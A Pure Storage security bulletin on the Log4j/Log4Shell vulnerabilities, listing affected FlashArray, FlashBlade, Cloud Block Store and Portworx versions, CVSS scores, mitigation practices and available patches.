Skip to main content
Pure Technical Services

Security Bulletin for Log4j/Log4Shell CVE-2021-44228

Currently viewing public documentation. Please login to access the full scope of documentation.

This is a final statement and will be updated as necessary and included in the Pure Community Page.  Multiple CVEs are addressed in this document related to Log4j / Log4Shell.

Product Resolution Guides
Pure Resolution FAQ Portworx - Log4j Solution FlashArray - Log4j Solution FlashBlade - Log4j Solution CBS - Log4j Solution

CVE-2021-44228 

On December 9, 2021, a critical 0-day vulnerability impacting multiple versions of the popular Apache Log4j 2 logging library was publicly disclosed (“vulnerability”).  The vulnerability, if exploited, may result in Remote Code Execution (RCE) by logging a certain string on affected installations. 

This vulnerability is being tracked as CVE-2021-44228. As stated in the CVE, “Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.”  Applications that are remotely accessible, can handle user-input and use Log4j (version lower than 2.15.0) to log this input are potentially vulnerable.  The CVE also states the following:

Apache Log4j versions prior to 2.15.0 are susceptible to a vulnerability that when successfully exploited could allow an attacker who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

Product CVSS Base Score
FlashArray 9.6 CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Cloud Block Store 9.6 CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
FlashBlade 8.4 CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Portworx 7.6 CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

General Mitigation Best Practices

Pure Storage recommends following network security best practices that minimize the risk of compromise due to this vulnerability including, but not limited to:

  • Restrict management interfaces to a trusted set of networks. Please see Best practices on restricting public IP addresses.  Additional security posture hardening may be achieved by restricting all control plane access through a jump box (bastion host).
  • Restrict outbound Internet access to trusted destinations.  Phone Home and Remote Assist (RA) require port 443 (https) to be open to CloudAssist subnet 52.40.255.224/27 only for outbound traffic and your firewall will need to accept inbound traffic for the established connection. 
  • Pure Storage strongly encourages the widely-endorsed best practice of highly restricting -- if not blocking altogether -- Internet access to administrative login interfaces, including connections via SSH, TLS, remote consoles, and remote desktop mechanisms.
  • Closely monitor arrays for abnormal or unexpected workload/ IO spikes or utilization as a leading indicator.  
  • Enable edge detection/protection mechanisms in the firewall / IDS / IPS systems to detect anomalous access or traffic patterns.

Affected Versions

Product Affected Version(s)
FlashArray
  • Purity//FA 6.2.0 - 6.2.3
  • Purity//FA 6.1.0 - 6.1.12
  • Purity//FA 6.0.0 - 6.0.8
  • Purity//FA 5.3.0 - 5.3.17
  • Purity//FA 5.2.x and all prior releases.
FlashBlade
  • Purity//FB 3.3.0
  • Purity//FB 3.2.0 - 3.2.4
  • Purity//FB 3.1.0 - 3.1.11
  • Purity//FB 3.0.x and all prior releases
Cloud Block Store
  • Purity//CBS 6.2.1 and all prior releases
Portworx
  • Portworx versions affected: 2.8.0+ (purestorage/ccm-service:3.0.0-rc1-3.0.6).
  • If you have not enabled telemetry in your Portworx cluster you are not at risk for this vulnerability.
Pure Storage Orchestrator (PSO) Pure Storage Orchestrator (PSO) is NOT affected by CVE-2021-44228, CVE-2021-45406, CVE-2021-45105.
Pure Storage ActiveCluster On-Premises Mediator Pure Storage ActiveCluster On-Premises Mediator is NOT affected by CVE-2021-44228CVE-2021-45406CVE-2021-45105

 

The following fixes are now available.

Product Type Version Notes
FlashArray Self-Service Patch
 Recommended Option
 
  • Purity//FA 6.2.x
  • Purity//FA 6.1.x
  • Purity//FA 6.0.x
  • Purity//FA 5.3.x
Online non-disruptive patch to address the Log4j vulnerability delivered via Pure1.

See FlashArray - Log4j Solution for more details.
FlashArray Manual Patch
  • Purity//FA 6.2.x
  • Purity//FA 6.1.x
  • Purity//FA 6.0.x
  • Purity//FA 5.3.x
  • Purity//FA 5.2.x
  • Purity//FA 5.1.x
  • Purity//FA 5.0.x
Online, non-disruptive patch to address the Log4j vulnerability, administered by Pure Storage Global Technical Services. 
FlashArray Purity Upgrade All Upgrades to the following versions of Purity//FA contain a permanent fix for Log4j: 
Cloud Block Store Purity Upgrade All Upgrades to the following versions contain a permanent fix for Log4j: 
  • Purity//CBS 6.2.4PAWS
  • Purity//CBS 6.2.4PAZ
  • Purity//CBS 6.1.13PAWS
  • Purity//CBS 6.1.13PAZ

See CBS - Log4j Solution for more details.

FlashBlade Self-Service Patch
 Recommended Option
  • Purity//FB 3.3.x
  • Purity//FB 3.2.x
  • Purity//FB 3.1.x
  • Purity//FB 3.0.x

Online, non-disruptive patch to address the Log4j vulnerability delivered via Pure1.

See FlashBlade - Log4j Solution for more details.

FlashBlade Manual Patch
  • Purity//FB 3.3.x
  • Purity//FB 3.2.x
  • Purity//FB 3.1.x
  • Purity//FB 3.0.x
Online, non-disruptive patch to address the Log4j vulnerability, administered by Pure Storage Global Technical Services.
FlashBlade Purity Upgrade All

Upgrades to the following versions of Purity//FB contain a permanent fix for Log4j: 

Portworx CCM Service Upgrade  

Portworx CCM container release incorporating Apache Log4j v2.16.0 (fixes in ccm-service:3.0.8)

See Portworx - Log4j Solution for more details.

Pure VM Analytics OVA Collector Upgrade   VMA collector v3.1.4 with the fixes is now available. Please refer to Upgrading Collectors for additional details.
Pure1 N/A N/A Pure1 infrastructure has been successfully updated with the appropriate fixes.

 

CVE-2021-45046 

On Tuesday 14 December, 2021, CVE-2021-45046 was released.  It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. 

Pure Storage has completed evaluating implications of CVE-2021-45046 against all products.  

  • FlashBlade, FlashArray, Cloud Block Store are not affected by CVE-2021-45046.
  • Portworx:  Portworx is not affected by CVE-2021-45046. However, Portworx CCM container release incorporating Apache Log4j v2.16.0 fixes in ccm-service:3.0.8 is now available. 
  • Pure VM Analytics OVA Collector:  VMA collector (v3.1.4) is now GA. New VM Analytics Collector OVA installations and upgrades will automatically receive VMA collector v3.1.4 which includes CCM v1.8.6 incorporating Apache Log4j v2.16.0 - Instructions For Updating Pure VMC OVA Collector.   (NOTE:  3.3.1 is the common OVA version. Once installed, it will download the VMA collector version 3.1.4).

CVE-2021-45105

Pure Storage is aware of the Apache Security Vulnerability CVE-2021-45105 posted Saturday, 18-DEC-2021.  Pure Storage has assessed all Pure product families against this vulnerability.  FlashArray, FlashBlade, Cloud Block Store, Portworx, Pure1, and VM Analytics Collector are not affected by this vulnerability.

CVE-2021-44832

Pure Storage is aware of the Apache Security Vulnerability CVE-2021-44832 posted Monday, 27-DEC-2021.  Pure Storage has assessed all Pure product families against this vulnerability.  FlashArray, FlashBlade, Cloud Block Store, Portworx, Pure1, and VM Analytics Collector are not affected by this vulnerability.

Contacting Support

If you would like one of our engineers to assist you with this issue please call +1(866) 244-7121.  If calling from outside the US here is a list of phone numbers:  https://support.purestorage.com/Pure1/Support.